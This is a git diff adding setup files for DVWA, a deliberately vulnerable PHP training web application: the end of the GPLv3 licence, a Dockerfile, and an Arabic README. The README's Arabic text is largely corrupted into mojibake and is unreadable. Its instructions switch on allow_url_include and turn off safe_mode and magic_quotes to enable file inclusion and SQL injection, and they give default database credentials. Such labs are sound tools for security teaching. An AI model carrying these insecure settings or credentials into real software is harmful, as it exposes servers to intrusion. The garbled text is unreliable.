conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + \ No newline at end of file diff --git a/DVWA/Dockerfile b/DVWA/Dockerfile new file mode 100644 index 00000000..662ba1f5 --- /dev/null +++ b/DVWA/Dockerfile @@ -0,0 +1,25 @@ +FROM docker.io/library/php:8-apache + +LABEL org.opencontainers.image.source=https://github.com/digininja/DVWA +LABEL org.opencontainers.image.description="DVWA pre-built image." +LABEL org.opencontainers.image.licenses="gpl-3.0" + +WORKDIR /var/www/html + +# https://www.php.net/manual/en/image.installation.php +RUN apt-get update \ + && export DEBIAN_FRONTEND=noninteractive \ + && apt-get install -y zlib1g-dev libpng-dev libjpeg-dev libfreetype6-dev iputils-ping git \ + && apt-get clean -y && rm -rf /var/lib/apt/lists/* \ + && docker-php-ext-configure gd --with-jpeg --with-freetype \ + && a2enmod rewrite \ + # Use pdo_sqlite instead of pdo_mysql if you want to use sqlite + && docker-php-ext-install gd mysqli pdo pdo_mysql + +COPY --from=composer:latest /usr/bin/composer /usr/local/bin/composer +COPY --chown=www-data:www-data . . +COPY --chown=www-data:www-data config/config.inc.php.dist config/config.inc.php + +# This is configuring the stuff for the API +RUN cd /var/www/html/vulnerabilities/api \ + && composer install \ diff --git a/DVWA/README.ar.md b/DVWA/README.ar.md new file mode 100644 index 00000000..b34415df --- /dev/null +++ b/DVWA/README.ar.md @@ -0,0 +1,409 @@ +# DAMN VULNERABLE WEB APPLICATION + +ØĨŲ† Damn Vulnerable Web Application (DVWA) Ų‡Ųˆ ØĒØˇØ¨ŲŠŲ‚ ŲˆŲŠØ¨ ØĒŲ… ØĨØļؚاŲŲ‡ ØšŲ…داŲ‹ ŲˆŲ…ØĩŲ…Ų… بŲ€ PHP / MySQL. اŲ„Ų‡Ø¯Ų اŲ„ØąØĻŲŠØŗŲŠ Ų‡Ųˆ Ų…Øŗاؚد؊ Ų…ØŽØĒØĩŲŠ ØŖŲ…Ų† اŲ„Ų…ØšŲ„ŲˆŲ…اØĒ ŲˆØ°Ų„Ųƒ با؎ØĒØ¨Ø§Øą Ų…Ų‡Ø§ØąØ§ØĒŲ‡Ų… ŲˆØŖدŲˆØ§ØĒŲ‡Ų… ŲŲŠ بŲŠØĻØŠ ØĒشبŲ‡ اŲ„بŲŠØĻØŠ اŲ„Ø­Ų‚ŲŠŲ‚ŲŠØŠØŒ ŲˆŲ…Øŗاؚد؊ Ų…ØˇŲˆØąŲŠ اŲ„ŲˆŲŠØ¨ ØšŲ„Ų‰ ŲŲ‡Ų… ØˇØąŲ‚ ØĒØŖŲ…ŲŠŲ† ØĒØˇØ¨ŲŠŲ‚اØĒ اŲ„ŲˆŲŠØ¨ بشŲƒŲ„ ØŖŲØļŲ„ ŲˆŲ…Øŗاؚد؊ ŲƒŲ„ Ų…Ų† اŲ„ØˇŲ„اب ŲˆØ§Ų„Ų…Ø¯ØąØŗŲŠŲ† ŲŲŠ اŲ„ØĒØšØąŲ ØšŲ„Ų‰ ØŖŲ…اŲ† ØĒØˇØ¨ŲŠŲ‚اØĒ اŲ„ŲˆŲŠØ¨ ŲŲŠ بŲŠØĻØŠ Ų…Ø­ŲƒŲ…ØŠ. + +اŲ„Ų‡Ø¯Ų Ų…Ų† DVWA Ų‡Ųˆ **اŲ„ØĒØ¯ØąØ¨ ØšŲ„Ų‰ بؚØļ Ų†Ų‚Ø§Øˇ اŲ„ØļØšŲ ØšŲ„Ų‰ اŲ„ŲˆŲŠØ¨ اŲ„ØŖŲƒØĢØą Ø´ŲŠŲˆØšŲ‹Ø§** ، ØļŲ…Ų† **Ų…ØŗØĒŲˆŲŠØ§ØĒ Ų…ØŽØĒŲ„ŲØŠ Ų…Ų† اŲ„ØĩØšŲˆØ¨ØŠ** ، بŲˆØ§ØŦŲ‡ØŠ بØŗŲŠØˇØŠ ŲˆŲ…Ø¨Ø§Ø´ØąØŠ. +ŲŠØąØŦŲ‰ Ų…Ų„احظ؊ ØŖŲ† Ų‡Ų†Ø§Ųƒ **ØĢØēØąØ§ØĒ Ų…ŲˆØĢŲ‚ØŠ ŲˆØēŲŠØą Ų…ŲˆØĢŲ‚ØŠ** ŲŲŠ Ų‡Ø°Ø§ اŲ„ØĒØˇØ¨ŲŠŲ‚ ,Ų‡Ųˆ ØĨØŦØąØ§ØĄ Ų…ØĒØšŲ…د. Ų†Ø­Ų† Ų†Ø´ØŦØš ØšŲ„Ų‰ Ų…حاŲˆŲ„ØŠ اŲƒØĒشاŲ ØŖŲƒØ¨Øą ؚدد Ų…Ų…ŲƒŲ† Ų…Ų† اŲ„Ų…Ø´ŲƒŲ„اØĒ. +- - - + +## ØĒحذŲŠØą! + +ØĨŲ† Damn Vulnerable Web Application (DVWA) ØļØšŲŠŲ Ų„Ų„ØēاŲŠØŠ ØŖŲ…Ų†ŲŠØ§Ų‹! **Ų„ا ØĒØļØšŲ‡ ŲŲŠ Ų…ØŦŲ„د html اŲ„ؚاŲ… ŲŲŠ اŲ„اØŗØĒØļاŲØŠ اŲ„؎اØĩØŠ بŲƒ ØŖŲˆ اŲ„ØŽŲˆØ§Ø¯Ų… اŲ„ØĒŲŠ ØĒØšŲ…Ų„ ØšŲ„Ų‰ اŲ„اŲ†ØĒØąŲ†ØĒ** ، ØĨØ° ØŖŲ†Ų‡ ØŗŲŠØĒŲ… ا؎ØĒØąØ§Ų‚Ų‡Ø§. ŲŠŲŲˆØĩŲ‰ باØŗØĒ؎داŲ… ŲƒŲŠØ§Ų† اŲØĒØąØ§ØļŲŠ (Ų…ØĢŲ„ [VirtualBox] (https://www.virtualbox.org/) ØŖŲˆ [VMware] (https://www.vmware.com/)) ، ŲˆŲŠØĒŲ… ØĒØšŲŠŲŠŲ†Ų‡ ØšŲ„Ų‰ ŲˆØļØš شبŲƒØŠ NAT، ŲŠŲ…ŲƒŲ†Ųƒ ØĒŲ†Ø˛ŲŠŲ„ ŲˆØĒØĢبŲŠØĒ [XAMPP] (https://www.apachefriends.org/) Ų„؎ادŲ… اŲ„ŲˆŲŠØ¨ ŲˆŲ‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ. + + +### ØĨØŽŲ„Ø§ØĄ Ų…ØŗؤŲˆŲ„ŲŠØŠ + +Ų†Ø­Ų† Ų„ا Ų†ØĒØ­Ų…Ų„ Ų…ØŗؤŲˆŲ„ŲŠØŠ اŲ„ØˇØąŲŠŲ‚ØŠ اŲ„ØĒŲŠ ŲŠØŗØĒ؎دŲ… بŲ‡Ø§ ØŖŲŠ Ø´ØŽØĩ Ų‡Ø°Ø§ اŲ„ØĒØˇØ¨ŲŠŲ‚ (DVWA). ØĨØ° ØŖŲ†Ų†Ø§ ØŖŲˆØļØ­Ų†Ø§ ØŖØēØąØ§Øļ اŲ„ØĒØˇØ¨ŲŠŲ‚ ŲˆŲ„ا ŲŠŲ†Ø¨ØēŲŠ اØŗØĒ؎داŲ…Ų‡ بشŲƒŲ„ ØļØ§Øą. Ų„Ų‚د ØŖØĩØ¯ØąŲ†Ø§ ØĒحذŲŠØąØ§ØĒ ŲˆØ§ØĒØŽØ°Ų†Ø§ ØĒدابŲŠØą Ų„Ų…Ų†Øš اŲ„Ų…ØŗØĒ؎دŲ…ŲŠŲ† Ų…Ų† ØĒØĢبŲŠØĒ DVWA ØšŲ„Ų‰ ØŽŲˆØ§Ø¯Ų… اŲ„ŲˆŲŠØ¨ اŲ„Ø­Ų‚ŲŠŲ‚ŲŠØŠ. ØĨذا ØĒŲ… ا؎ØĒØąØ§Ų‚ ؎ادŲ… اŲ„ŲˆŲŠØ¨ اŲ„؎اØĩ بŲƒ ØšŲ† ØˇØąŲŠŲ‚ ØĒØĢبŲŠØĒ DVWA ، ŲŲ‡Ø°Ų‡ Ų„ŲŠØŗØĒ Ų…ØŗؤŲˆŲ„ŲŠØĒŲ†Ø§ ، بŲ„ ØĒŲ‚Øš ØšŲ„Ų‰ ؚاØĒŲ‚ اŲ„Ø´ØŽØĩ / اŲ„ØŖش؎اØĩ اŲ„Ø°ŲŠŲ† Ų‚اŲ…ŲˆØ§ بØĒØ­Ų…ŲŠŲ„Ų‡ ŲˆØĒØĢبŲŠØĒŲ‡. + +- - - + +## ØĒØąØŽŲŠØĩ + +Ų‡Ø°Ø§ اŲ„Ų…Ų„Ų ØŦØ˛ØĄ Ų…Ų† Damn Vulnerable Web Application (DVWA). + +ŲŠØšØ¯ ØĒØˇØ¨ŲŠŲ‚ Damn Vulnerable Web Application (DVWA) Ø¨ØąŲ†Ø§Ų…ØŦŲ‹Ø§ Ų…ØŦاŲ†ŲŠŲ‹Ø§: ŲŠŲ…ŲƒŲ†Ųƒ ØĨؚاد؊ ØĒŲˆØ˛ŲŠØšŲ‡ Ųˆ / ØŖŲˆ ØĒؚدŲŠŲ„Ų‡ +بŲ…ŲˆØŦب Ø´ØąŲˆØˇ GNU General Public License ŲƒŲ…ا ØĒŲ… Ų†Ø´ØąŲ‡Ø§ بŲˆØ§ØŗØˇØŠ +Free Software Foundation ، ØĨŲ…ا اŲ„ØĨØĩØ¯Ø§Øą 3 Ų…Ų† اŲ„ØĒØąØŽŲŠØĩ ، ØŖŲˆ +(Ø­Øŗب ا؎ØĒŲŠØ§ØąŲƒ) ØŖŲŠ ØĨØĩØ¯Ø§Øą Ų„احŲ‚. + +ŲŠØĒŲ… ØĒŲˆØ˛ŲŠØš Damn Vulnerable Web Application (DVWA) Ų„ØĒØ­Ų‚ŲŠŲ‚ اŲ„ŲØ§ØĻد؊ ، +ŲˆŲ„ŲƒŲ† دŲˆŲ† ØŖŲŠ ØļŲ…اŲ† ؛ Ø­ØĒŲ‰ بدŲˆŲ† اŲ„ØļŲ…اŲ† اŲ„ØļŲ…Ų†ŲŠ Ų„Ų€ +اŲ„Ų‚ابŲ„ŲŠØŠ Ų„Ų„ØĒØŗŲˆŲŠŲ‚ ØŖŲˆ اŲ„Ų…Ų„Ø§ØĄŲ…ØŠ Ų„ØēØąØļ Ų…ØšŲŠŲ†. ŲŠØąØŦŲ‰ اŲ„Ø§ØˇŲ„اؚ ØšŲ„Ų‰ +ØĒØąØŽŲŠØĩ GNU General Public License Ų„Ų…Ø˛ŲŠØ¯ Ų…Ų† اŲ„ØĒŲØ§ØĩŲŠŲ„. + + +ŲŠØŦب ØŖŲ† ØĒŲƒŲˆŲ† Ų‚د ØĒŲ„Ų‚ŲŠØĒ Ų†ØŗØŽØŠ Ų…Ų† ØĒØąØŽŲŠØĩ GNU General Public License +Ų…Øš Damn Vulnerable Web Application (DVWA)، ØĨذا Ų„Ų… ØĒØĒŲ„Ų‚Ų‰ Ų‡Ø°Ų‡ اŲ„ØąØŽØĩØŠØŒ ŲŠØąØŦŲ‰ اŲ„Ø§ØˇŲ„اؚ ØšŲ„Ų‰ . + +- - - + +## اŲ„ØĒØąØŦŲ…ØŠ + +Ų‡Ø°Ø§ اŲ„Ų…Ų„Ų Ų…ØĒŲˆŲØą بؚد؊ Ų„ØēاØĒ: + +- اŲ„ØĩŲŠŲ†ŲŠØŠ: [įŽ€äŊ“中文](README.zh.md) +- اŲ„ØĒØąŲƒŲŠØŠ: [TÃŧrkçe](README.tr.md) +- اŲ„ØšØąØ¨ŲŠØŠ: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) + +ØĨذا ŲƒŲ†ØĒ ØĒØąØēب ŲŲŠ اŲ„Ų…ØŗاŲ‡Ų…ØŠ ŲŲŠ ØĒØąØŦŲ…ØŠ ، ŲŠØąØŦŲ‰ ØĒŲ‚دŲŠŲ… PR . ŲˆŲ„ا ŲŠØšŲ†ŲŠ Ø°Ų„Ųƒ Ų…ØŦØąØ¯ اØŗØĒ؎داŲ… ؎دŲ…ØŠ اŲ„ØĒØąØŦŲ…ØŠ Ų…Ų† Google ŲˆØĨØąØŗاŲ„ اŲ„Ų…ØŗاŲ‡Ų…ØŠ ، ØĨØ° ØŖŲ†Ų‡ ØŗŲŠØĒŲ… ØąŲØļŲ‡Ø§. + +- - - + +## اŲ„ØĒØ­Ų…ŲŠŲ„ + +ØĒŲˆØŦد ØĨØĩØ¯Ø§ØąØ§ØĒ Ų…ØŽØĒŲ„ŲØŠ Ų…Ų† DVWA Ø­ŲˆŲ„Ų‡Ø§ ، ŲˆØ§Ų„ØĨØĩØ¯Ø§Øą اŲ„ŲˆØ­ŲŠØ¯ اŲ„Ų…دؚŲˆŲ… Ų‡Ųˆ ØŖحدØĢ Ų…ØĩØ¯Øą Ų…Ų† Ų…ØŗØĒŲˆØ¯Øš GitHub اŲ„ØąØŗŲ…ŲŠ. ŲŠŲ…ŲƒŲ†Ųƒ ØĨŲ…ا Øŗحب Ų†ØŗØŽØŠ clone Ų…Ų† اŲ„ØąŲŠØ¨Ųˆ Repo: + +``` +git clone https://github.com/digininja/DVWA.git +``` + +ØŖŲˆ [ØĒØ­Ų…ŲŠŲ„ Ų…Ų„Ų ZIP Ų„Ų„Ų…Ų„ŲØ§ØĒ](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## اŲ„ØĒØĢبŲŠØĒ + +**ŲŠØąØŦŲ‰ اŲ„ØĒØŖŲƒØ¯ Ų…Ų† ŲˆØŦŲˆØ¯ Ų…Ų„Ų config / config.inc.php اŲ„؎اØĩ بŲƒ. ØĨŲ† ŲˆØŦŲˆØ¯ Ų…Ų„Ų config.inc.php.dist بŲ…ŲØąØ¯Ų‡ Ų„Ų† ŲŠŲƒŲˆŲ† ŲƒØ§ŲŲŠŲ‹Ø§ ŲˆŲŠØŦب ØšŲ„ŲŠŲƒ ØĒؚدŲŠŲ„Ų‡ Ų„ŲŠŲ„اØĻŲ… بŲŠØĻØĒŲƒ ŲˆØĨؚاد؊ ØĒØŗŲ…ŲŠØĒŲ‡ ØĨŲ„Ų‰ config.inc.php ، Ų‚د ŲŠØŽŲŲŠ Windows اŲ…ØĒداداØĒ اŲ„Ų…Ų„ŲØ§ØĒ، ŲŠØŦب ØšŲ„ŲŠŲƒ ØĨظŲ‡Ø§ØąŲ‡Ø§ Ų„ØĒؚدŲŠŲ„ اŲ…ØĒداد اŲ„Ų…Ų„Ų.](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/)** + +### ŲŲŠØ¯ŲŠŲˆ اŲ„ØĒØĢبŲŠØĒ + +- [ØĒØĢبŲŠØĒ Damn Vulnerable Web Application (DVWA) ØšŲ„Ų‰ Ų†Ø¸Ø§Ų… اŲ„ØĒØ´ØēŲŠŲ„ Windows 10 ](https://www.youtube.com/watch?v=cak2lQvBRAo) [12:39 دŲ‚ŲŠŲ‚ØŠ] + +### ØĒØĢبŲŠØĒ Windows + XAMPP + +ØŖØŗŲ‡Ų„ ØˇØąŲŠŲ‚ØŠ Ų„ØĒØĢبŲŠØĒ DVWA Ų‡ŲŠ ØĒØ­Ų…ŲŠŲ„ [XAMPP] ŲˆØĒØĢبŲŠØĒŲ‡ (https://www.apachefriends.org/) ØĨذا Ų„Ų… ŲŠŲƒŲ† Ų„دŲŠŲƒ ؎ادŲ… اŲ„ŲˆŲŠØ¨ ØŦاŲ‡Ø˛ ŲˆŲ…ؚد Ų…ØŗبŲ‚اŲ‹. + +ŲŠØšØ¯ XAMPP ŲˆØŗŲŠŲ„ØŠ ØŗŲ‡Ų„ØŠ Ų„ØĒØĢبŲŠØĒ Apache Distribution ŲŲŠ ØŖŲ†Ø¸Ų…ØŠ Linux Ųˆ Solaris Ųˆ Windows Ųˆ Mac OS X. ØĒØĒØļŲ…Ų† اŲ„Ø­Ø˛Ų…ØŠ ؎ادŲ… اŲ„ŲˆŲŠØ¨ Apache Ųˆ MySQL Ųˆ PHP Ųˆ Perl ŲˆØŽØ§Ø¯Ų… FTP Ųˆ phpMyAdmin. + +ŲŠŲ…ŲƒŲ† ØĒØ­Ų…ŲŠŲ„ XAMPP Ų…Ų† Ų‡Ų†Ø§: + + +ببØŗØ§ØˇØŠ Ų‚Ų… بŲŲƒ ØļØēØˇ dvwa.zip ، ØļØš اŲ„Ų…Ų„ŲØ§ØĒ اŲ„ØĒŲŠ ØĒŲ… ŲŲƒ ØļØēØˇŲ‡Ø§ ŲŲŠ Ų…ØŦŲ„د html اŲ„ؚاŲ… ، ØĢŲ… Ø§ØˇŲ„ب اŲ„ØšŲ†ŲˆØ§Ų† اŲ„ØĒاŲ„ŲŠ Ų…Ų† اŲ„Ų…ØĒØĩŲØ­: `http://127.0.0.1/dvwa/setup.php` + +### Ø­Ø˛Ų… Linux +ØĨذا ŲƒŲ†ØĒ ØĒØŗØĒ؎دŲ… ØĒŲˆØ˛ŲŠØšØŠ Linux Ų…بŲ†ŲŠØŠ ØšŲ„Ų‰ Debian ، ŲØŗØĒØ­ØĒاØŦ ØĨŲ„Ų‰ ØĒØĢبŲŠØĒ اŲ„Ø­Ø˛Ų… اŲ„ØĒاŲ„ŲŠØŠ _ (ØŖŲˆ Ų…ا ŲŠŲƒØ§ŲØĻŲ‡Ø§) _: + +`apt-get -y install apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php` + +ØŗŲŠØšŲ…Ų„ اŲ„Ų…ŲˆŲ‚Øš Ų…Øš MySQL بدŲ„اŲ‹ Ų…Ų† MariaDB Ų„ŲƒŲ†Ų†Ø§ Ų†ŲˆØĩŲŠ بشد؊ باØŗØĒ؎داŲ… MariaDB Ų„ØŖŲ†Ų‡ ŲŠØšŲ…Ų„ ØŽØ§ØąØŦ اŲ„ØĩŲ†Ø¯ŲˆŲ‚ØŒ ØŗŲŠØĒØšŲŠŲ† ØšŲ„ŲŠŲƒ ØĨØŦØąØ§ØĄ ØĒØēŲŠŲŠØąØ§ØĒ Ų„ØĒŲ…ŲƒŲŠŲ† MySQL Ų…Ų† اŲ„ØšŲ…Ų„ بشŲƒŲ„ ØĩØ­ŲŠØ­. + +### ØĨؚداد Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ + +Ų„ØĨؚداد Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ ، Ų…ا ØšŲ„ŲŠŲƒ ØŗŲˆŲ‰ اŲ„ØļØēØˇ ØšŲ„Ų‰ اŲ„Ø˛Øą `Setup DVWA` ŲŲŠ اŲ„Ų‚اØĻŲ…ØŠ اŲ„ØąØĻŲŠØŗŲŠØŠ ، ØĢŲ… ااŲ„ØļØēØˇ ØšŲ„Ų‰ اŲ„Ø˛Øą `Create / Reset Database`. ØŗŲŠØ¤Ø¯ŲŠ Ų‡Ø°Ø§ ØĨŲ„Ų‰ ØĨŲ†Ø´Ø§ØĄ / ØĨؚاد؊ ØĒØšŲŠŲŠŲ† Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ ŲˆØĨØļاŲØŠ بؚØļ اŲ„بŲŠØ§Ų†Ø§ØĒ. + +ØĨذا ظŲ‡Øą ØŽØˇØŖ ØŖØĢŲ†Ø§ØĄ Ų…حاŲˆŲ„ØŠ ØĨŲ†Ø´Ø§ØĄ Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ، ŲØĒØŖŲƒØ¯ Ų…Ų† Øĩح؊ بŲŠØ§Ų†Ø§ØĒ اŲ„د؎ŲˆŲ„ Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ (اØŗŲ… اŲ„Ų…ØŗØĒ؎دŲ… ŲˆŲƒŲ„Ų…ØŠ اŲ„Ų…ØąŲˆØą) ŲŲŠ اŲ„Ų…Ų„Ų `/config/config.inc.php` *ŲˆŲ‡Ø°Ø§ اŲ„Ų…Ų„Ų ŲŠØŽØĒŲ„Ų ØšŲ† config.inc.php.dist ŲˆØ§Ų„Ø°ŲŠ ŲŠØšØĒØ¨Øą Ų…ØĢاŲ„.* + +ØĒŲ… ØļØ¨Øˇ Ų‚ŲŠŲ… اŲ„Ų…ØĒØ­ŲˆŲ„اØĒ اŲ„ØĒاŲ„ŲŠØŠ اŲØĒØąØ§ØļŲŠØ§Ų‹ ŲˆŲŲ‚ Ų…ا ŲŠŲ„ŲŠ: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +Ų…Ų„احظ؊ ، ØĨذا ŲƒŲ†ØĒ ØĒØŗØĒ؎دŲ… MariaDB بدŲ„اŲ‹ Ų…Ų† MySQL (ŲŠØšØ¯ MariaDB اŲØĒØąØ§ØļŲŠŲ‹Ø§ ŲŲŠ Kali) ، ŲŲ„ا ŲŠŲ…ŲƒŲ†Ųƒ اØŗØĒ؎داŲ… root ŲƒŲ…ØŗØĒ؎دŲ…ØŒ ŲŠØŦب ØšŲ„ŲŠŲƒ ØĨŲ†Ø´Ø§ØĄ Ų…ØŗØĒ؎دŲ… Ų‚اؚد؊ بŲŠØ§Ų†Ø§ØĒ ØŦدŲŠØ¯. Ų„Ų„Ų‚ŲŠØ§Ų… بذŲ„Ųƒ ، اØĒØĩŲ„ بŲ‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ بØĩŲØĒŲƒ اŲ„Ų…ØŗØĒ؎دŲ… root، ŲˆŲ†ŲØ° اŲ„ØŖŲˆØ§Ų…Øą اŲ„ØĒاŲ„ŲŠØŠ: + +```mysql +mysql> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +mysql> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### ØĒŲƒŲˆŲŠŲ†Ø§ØĒ ØŖØŽØąŲ‰ + +اؚØĒŲ…ادŲ‹Ø§ ØšŲ„Ų‰ Ų†Ø¸Ø§Ų… اŲ„ØĒØ´ØēŲŠŲ„ اŲ„؎اØĩ بŲƒ ŲˆØĨØĩØ¯Ø§Øą PHP ، Ų‚د ØĒØąØēب ŲŲŠ ØĒØēŲŠŲŠØą اŲ„ØĒŲƒŲˆŲŠŲ† اŲ„اŲØĒØąØ§ØļŲŠ default configuration. ØŗŲŠŲƒŲˆŲ† Ų…ŲˆŲ‚Øš اŲ„Ų…Ų„ŲØ§ØĒ Ų…ØŽØĒŲ„ŲŲ‹Ø§ Ø­Øŗب ŲƒŲ„ ØŦŲ‡Ø§Ø˛. + +**ØŗŲ…احŲŠØ§ØĒ اŲ„Ų…ØŦŲ„د**: +* اŲ„Ų…ØŗØ§Øą `/hackable/uploads/` - ŲŠØŦب ØŖŲ† ØĒØŗØĒØˇŲŠØš ؎دŲ…ØŠ اŲ„ŲˆŲŠØ¨ اŲ„ŲƒØĒاب؊ ØšŲ„Ų‰ Ų‡Ø°Ø§ اŲ„Ų…Ų„Ų (Ų„ØĒŲ†ŲŲŠØ° ŲˆØ¸ŲŠŲØŠ ØĒØ­Ų…ŲŠŲ„ اŲ„Ų…Ų„Ų). +* اŲ„Ų…ØŗØ§Øą `/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - ŲŠØŦب ØŖŲ† ØĒØŗØĒØˇŲŠØš ؎دŲ…ØŠ اŲ„ŲˆŲŠØ¨ اŲ„ŲƒØĒاب؊ ØšŲ„Ų‰ Ų‡Ø°Ø§ اŲ„Ų…Ų„Ų (ØĨذا ŲƒŲ†ØĒ ØĒØąØēب باØŗØĒ؎داŲ… PHPIDS). + + +**ØĒŲƒŲˆŲŠŲ† PHP**: +* اŲ„ØŽŲŠØ§Øą `allow_url_include = on` - اŲ„ØŗŲ…اح بØĒØļŲ…ŲŠŲ† اŲ„Ų…Ų„ŲØ§ØĒ ØšŲ† بؚد Remote File Inclusions (RFI) [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] +* اŲ„ØŽŲŠØ§Øą `allow_url_fopen = on` - اŲ„ØŗŲ…اح بØĒØļŲ…ŲŠŲ† اŲ„Ų…Ų„ŲØ§ØĒ ØšŲ† بؚد Remote File Inclusions (RFI) [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] +* اŲ„ØŽŲŠØ§Øą `safe_mode = off` - (ØĨذا ŲƒØ§Ų† ØĨØĩØ¯Ø§Øą PHP ØŖŲ‚Ų„ Ų…Ų† ØŖŲˆ ŲŠØŗاŲˆŲŠ 5.4) اŲ„ØŗŲ…اح بحŲ‚Ų† SQL - SQL Injection (SQLi) [[safe_mode](https://secure.php.net/manual/en/features.safe-mode.php)] +* اŲ„ØŽŲŠØ§Øą `magic_quotes_gpc = off` - (ØĨذا ŲƒØ§Ų† ØĨØĩØ¯Ø§Øą PHP ØŖŲ‚Ų„ Ų…Ų† ØŖŲˆ ŲŠØŗاŲˆŲŠ 5.4) اŲ„ØŗŲ…اح بحŲ‚Ų† SQL - SQL Injection (SQLi) [[magic_quotes_gpc](https://secure.php.net/manual/en/security.magicquotes.php)] +* اŲ„ØŽŲŠØ§Øą `display_errors = off` - (ا؎ØĒŲŠØ§ØąŲŠ) ØĨØŽŲØ§ØĄ ØąØŗاØĻŲ„ ØĒحذŲŠØą PHP Ų„ØŦØšŲ„Ų‡Ø§ ØŖŲ‚Ų„ ØĨØŗŲ‡Ø§Ø¨Ų‹Ø§ [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + +**اŲ„Ų…Ų„Ų: `config/config.inc.php`**: + +* اŲ„Ų…ØĒØ­ŲˆŲ„اØĒ `$_DVWA[ 'recaptcha_public_key' ]` Ųˆ`$_DVWA[ 'recaptcha_private_key' ]` ŲŠØŦب ØĒŲˆŲ„ŲŠØ¯ Ų‚ŲŠŲ… Ų‡Ø°Ų‡ اŲ„Ų…ØĒØ­ŲˆŲ„اØĒ ŲˆØ°Ų„Ųƒ Ų…Ų† ØŽŲ„اŲ„: https://www.google.com/recaptcha/admin/create + +### بŲŠØ§Ų†Ø§ØĒ اŲ„د؎ŲˆŲ„ 